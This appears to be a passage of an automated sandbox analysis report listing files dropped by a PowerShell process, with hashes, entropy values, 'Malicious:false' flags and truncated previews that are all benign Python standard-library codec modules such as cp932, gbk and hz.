                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp874 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP874.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp874',..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13161
                                                                                                                                                                                                                      Entropy (8bit):4.598690745287678
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:LHhsuOTDvRUUZkPS3RI4WcMHFVleIuiZdH77eDVqeOFf2nuS:eT5RIzc+gi72DcdFOnb
                                                                                                                                                                                                                      MD5:3DAB3DF72E688978781C91CEA3285C4A
                                                                                                                                                                                                                      SHA1:65664E8974B621B2C461774187C483ABFA0E735F
                                                                                                                                                                                                                      SHA-256:5C42ADFEC39CF9D891FBB2ED19D882C6160A00B8487B7867F9E2296B9E2F491B
                                                                                                                                                                                                                      SHA-512:7F940428049BCB0A95FC67FC178749B61ABF522646A68505B5B420718E5BD8ABBF6973B48CBF17DDA48179ABBA4D31F1E2169DBD5EFA33C044414A7A02673899
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec cp875 generated from 'MAPPINGS/VENDORS/MICSFT/EBCDIC/CP875.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='cp875',.. e
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1062
                                                                                                                                                                                                                      Entropy (8bit):4.549007604127859
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:n5oqwOzff/XohaZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj93cJxFpz:Oqpwhat62VJjRU8njOxLnrxLbrLKmJx/
                                                                                                                                                                                                                      MD5:70E562A99A8F07255F47C5F3C05518A5
                                                                                                                                                                                                                      SHA1:F1F0A00A3238B19786D88B83F9FA57D043E2D0A9
                                                                                                                                                                                                                      SHA-256:F917DB40F96F9F676E45FD9F1A7FA5D9BBB67A703BDF88B546CA4DA84C4905F5
                                                                                                                                                                                                                      SHA-512:48C7BF7FDA257EC6ECC4421BFEF66E026C285DABB358ED41DDB6A9FFC6D73F61DA35F25A5622FC8D9D4D086D4BFA37E67A40810D39A6FA5F538F61427304298A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# cp932.py: Python Unicode Codec for CP932..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('cp932')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp932',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1062
                                                                                                                                                                                                                      Entropy (8bit):4.532318933180232
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:no53qzqOzSf/XoxKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9+6cJxFV:otqzHzl62VJjRU8njOxLnrxLbrLK03Jd
                                                                                                                                                                                                                      MD5:D85D0503255F9363D30F7B7AAD7355D4
                                                                                                                                                                                                                      SHA1:DE0F8989F4BBE4CC9A91241DEED093BF259E2DC1
                                                                                                                                                                                                                      SHA-256:DA13FD6F1BD7A1D3B48AED1FC75F7516D6A33814086CF971E030625590E9DDA0
                                                                                                                                                                                                                      SHA-512:ED408E5A0B1042E0F1F94CF57171381F4B2A0491B9319BF2E0E02DB8B63BF342D7C4091B97DA8F9802B6EA0AE94EFFBE797F17E92F25E5F436BD88E11E4735B7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# cp949.py: Python Unicode Codec for CP949..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('cp949')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp949',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1062
                                                                                                                                                                                                                      Entropy (8bit):4.541713907609811
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nqqqhOz6f/XoHKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFplR:qqVLj62VJjRU8njOxLnrxLbrLKWJxTz
                                                                                                                                                                                                                      MD5:15D67984C7486D079058D4DBA07DDBBE
                                                                                                                                                                                                                      SHA1:51AE51CD6ED99E4B594A5EFF1621308AA89DE532
                                                                                                                                                                                                                      SHA-256:8FD6E86DFB38006E753B3B0301AA4B377C64C25F4EC9E6333FC99C3F06E90917
                                                                                                                                                                                                                      SHA-512:46F3A96CE463669D8AD256C53C84EE201FB3D1EC0BEEEE55E622E75E93D1C9AA272BC0A414F3E65123C9BB1972BEEC9A8F43B2B9ACF849A2361DB188EE3F7836
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# cp950.py: Python Unicode Codec for CP950..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_tw, codecs..import _multibytecodec as mbc....codec = _codecs_tw.getcodec('cp950')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='cp950',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamrea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1090
                                                                                                                                                                                                                      Entropy (8bit):4.603655042489424
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nsqVsOzff/XoL2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9TcJxFplR:sqHwU62VJjRU8njOxLnrxLbrLKKJxTz
                                                                                                                                                                                                                      MD5:F1FAE768C9FF8329D237608533530CED
                                                                                                                                                                                                                      SHA1:3167902E4F9294DB74131FA2CE505E2F62B9C9B4
                                                                                                                                                                                                                      SHA-256:78265BA431395662E7252A9B79BC2A75FFE438DB872B2CF1CBCFB243D83F0C87
                                                                                                                                                                                                                      SHA-512:F726B7652435D174D1D84578A9278DD6B751B62CE231247CE4299860A5A4B2E1DB1D243B370625633D526278D30F2D05BBEBA9FC9E8312A103C455C65E802D68
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# euc_jis_2004.py: Python Unicode Codec for EUC_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1090
                                                                                                                                                                                                                      Entropy (8bit):4.624592201957947
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nrqLOzff/XoL1KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqAwl62VJjRU8njOxLnrxLbrLKLJxTz
                                                                                                                                                                                                                      MD5:45A11BD69244CE2DCC3FF49206AD041B
                                                                                                                                                                                                                      SHA1:C0FF2F0406F4158D26DA4FC850584D14764FCA55
                                                                                                                                                                                                                      SHA-256:12CA22A7DB25D9EEEF9BF5FACDC5594E3165CCF451528D36E3B68A03989521AC
                                                                                                                                                                                                                      SHA-512:06AFD42F84A6E83A55645C82A638A7AF6C545401570EB3871913060FCBCC8D348583F589E3133745A6584998493C35DE25F66336E7D4F48EAC1BFDD6C35D08D6
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# euc_jisx0213.py: Python Unicode Codec for EUC_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incrementa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1066
                                                                                                                                                                                                                      Entropy (8bit):4.531522047071056
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:n9qNOzff/XoLjKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9KcJxFplR:9q2wL62VJjRU8njOxLnrxLbrLKlJxTz
                                                                                                                                                                                                                      MD5:0F2187EA4FC89DA2F54522EF29F58A7F
                                                                                                                                                                                                                      SHA1:9DE39800CBBD630D7D4A1504C1A07F334EF3FAC5
                                                                                                                                                                                                                      SHA-256:8927683A4234B936BE1935B8A799BE78520438BB5EA072499D51E7FE3D182987
                                                                                                                                                                                                                      SHA-512:61BDFF78DE0A5E781C47F692620F7ACCD78AA006F530D478502A0905D51312B499E119F2EAA5524F2CEEF3CC4950F2865A1EFCFFF23BB4B9702579E0F3AEC97C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# euc_jp.py: Python Unicode Codec for EUC_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('euc_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1066
                                                                                                                                                                                                                      Entropy (8bit):4.509188463695804
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nSBqnChOzSf/Xoap0KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9DJFc3:EqnXzao62VJjRU8njOxLnrxLbrLK9J+3
                                                                                                                                                                                                                      MD5:B6EF8BD54861FA5D1E0AFF68F50F2913
                                                                                                                                                                                                                      SHA1:3CB1AC8785AF724B359BEFBFC3758D918067B77A
                                                                                                                                                                                                                      SHA-256:03AFE0CF8020529EAD00A0EA26A7131D354994CD2352D42F9032216B3748EA91
                                                                                                                                                                                                                      SHA-512:B8147C8F711BC1ACE96FB2769F79A54728F7A744FCCD3AA4BE1257E8F09507DEDE44CF9F5C1F089BB88F11A88D372874EB343BB48AFE639A6C7E8D27204BFA05
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# euc_kr.py: Python Unicode Codec for EUC_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_kr, codecs..import _multibytecodec as mbc....codec = _codecs_kr.getcodec('euc_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='euc_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1070
                                                                                                                                                                                                                      Entropy (8bit):4.573121414528306
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nBMqgOz+f/Xo1GoKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9zcJxFpz:Wq5P1l62VJjRU8njOxLnrxLbrLKSJxTz
                                                                                                                                                                                                                      MD5:40B18EE51A3241C53EF5CBC6C019997D
                                                                                                                                                                                                                      SHA1:C4F48863B74CB56844A2CC68AF9629D9407B7CF7
                                                                                                                                                                                                                      SHA-256:0D9C1DB7E2959E60E4F6CB4B97C884585668C55B48F2D9D715B2BDAF5E78C671
                                                                                                                                                                                                                      SHA-512:12952CBED997D8E4F3608F2DA4BA0FAC468D7D48E7685556E3669AF18FC6C238688713894E4490AACDC05C253242ADE9C88E522DC45EB9D5827E29548108D5AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# gb18030.py: Python Unicode Codec for GB18030..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb18030')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb18030',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. s
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1066
                                                                                                                                                                                                                      Entropy (8bit):4.554621344303813
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nB6q6Oz+f/Xo11ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9jcJxFpz:oq3P11t62VJjRU8njOxLnrxLbrLK+Jx/
                                                                                                                                                                                                                      MD5:72F02C10927F33B52DF6549FF1F52E60
                                                                                                                                                                                                                      SHA1:6C666F6A4C36D0C3CBD944216E170E26D7B5D91A
                                                                                                                                                                                                                      SHA-256:2B5573EBF7FDC20DCF126633ADF0B7283C08629D36DBEFA669C985C9DDB98EA7
                                                                                                                                                                                                                      SHA-512:F7F0D5C10490026F0809714BEED7CB2F5AB284C7BDC05BCBDF7C690A255DBA59F815B5524D88F5ED35CD6FD668C93695126EF7153CCBFA5B58BAA5E151839C51
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# gb2312.py: Python Unicode Codec for GB2312..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gb2312')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gb2312',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. strea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1054
                                                                                                                                                                                                                      Entropy (8bit):4.504465163109839
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nBOEpqNOz+f/Xo1SKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9scJxFV:4Epq2P1k62VJjRU8njOxLnrxLbrLKPJd
                                                                                                                                                                                                                      MD5:0D6CF4D6FFFB4B761BEBCEBC1D2C3CF3
                                                                                                                                                                                                                      SHA1:64C7CD7A46E8CAE1CB9F0700035CA6BD2EC73C76
                                                                                                                                                                                                                      SHA-256:9C7828E3B9661E39D4D75419A12B9D132FA9D0B4DAEC36F3DF51AD1C3A638DE3
                                                                                                                                                                                                                      SHA-512:0F4F577C2FB46AB6B6D8DD6CFB5F89C8748F67E864D9AB6E3D92904BB0AE9EDB6239CABDF8A8F9B11238EEB60870EB819499B4A942E2D3B5CB7032F444246FCF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# gbk.py: Python Unicode Codec for GBK..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('gbk')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='gbk',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=Stre
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1563
                                                                                                                                                                                                                      Entropy (8bit):4.660866418659877
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:Xtc/QX1AIgs1AIc1wX1euM8ivIvPTKs3ntJxHjH:XS/QX/gs/cmX8uAA3TKsdrH
                                                                                                                                                                                                                      MD5:1E55C95602534092B4DB3ED99CB9E67C
                                                                                                                                                                                                                      SHA1:D1DBA179C7F3B0FF22D4F1713275D0C48637BB48
                                                                                                                                                                                                                      SHA-256:5881C1AEEEB5F9CD27CE0E0E62AB9D6551F094955DBD52DC8184165DAF78AEBA
                                                                                                                                                                                                                      SHA-512:84DACC6B4CBFBB99D7D6F0124EF1E7B26035C7249730EB1C185B60A750DE2548CA60E8A939DF8445D5DDDF1F8D397708A264D9FD7771C674C7DA889C306C9D93
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:"""Python 'hex_codec' Codec - 2-digit hex content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import binascii....### Codec APIs....def hex_encode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.b2a_hex(input), len(input))....def hex_decode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.a2b_hex(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return hex_encode(input, errors).. def decode(self, input, errors='strict'):.. return hex_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return binascii.b2a_hex(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors == 'strict'..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13789
                                                                                                                                                                                                                      Entropy (8bit):4.607934099089844
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:zbhsuOTDvRFUrXPLouhIAs2+ijLoM69Ne/DD6e:STjuhIAlgM6G6e
                                                                                                                                                                                                                      MD5:1332CCB5750EB756B2856CCAD9E18CC1
                                                                                                                                                                                                                      SHA1:ACDBF93730FB0420EA5B77AFE7E3282669829EF4
                                                                                                                                                                                                                      SHA-256:681FF6A2273BD64450E04FC6F04B2EC63015A91490E30A31E25ED193708C99D4
                                                                                                                                                                                                                      SHA-512:6F43760A54CB494E48B8C9A659505727246AEAF539AD4A35AFE6F4F5D0E4A84C2F5F0ED5055794DE2D575E78D5A5D1497EB795F35D8F5533DF955587EBC38FD4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'hp_roman8.txt' with gencodec.py..... Based on data from ftp://dkuug.dk/i18n/charmaps/HP-ROMAN8 (Keld Simonsen).... Original source: LaserJet IIP Printer User's Manual HP part no.. 33471-90901, Hewlet-Packard, June 1989..... (Used with permission)...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.Strea
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1050
                                                                                                                                                                                                                      Entropy (8bit):4.49858978606931
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:nvpqxOz+f/Xo1cZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFpz:vpqyP1ct62VJjRU8njOxLnrxLbrLK5Jd
                                                                                                                                                                                                                      MD5:78235EEDFAE419F3CC13044D7890799B
                                                                                                                                                                                                                      SHA1:5BF1944AC39D99B3777CCD61DB7FAE3FF0D3E936
                                                                                                                                                                                                                      SHA-256:2601DC6EF938FF87BD2024B3C4785254F2B3DD4D8D34D8F63E254D7B8545B077
                                                                                                                                                                                                                      SHA-512:F5B7383FC8CBBAA13E8D101DD264D0F7952CD3A681F6746B5D941381A7CD39BE808D3E15375CF3778AC80D026658D494FA410CE1904683BD873D91C55DA9CA41
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#..# hz.py: Python Unicode Codec for HZ..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('hz')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='hz',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamRe
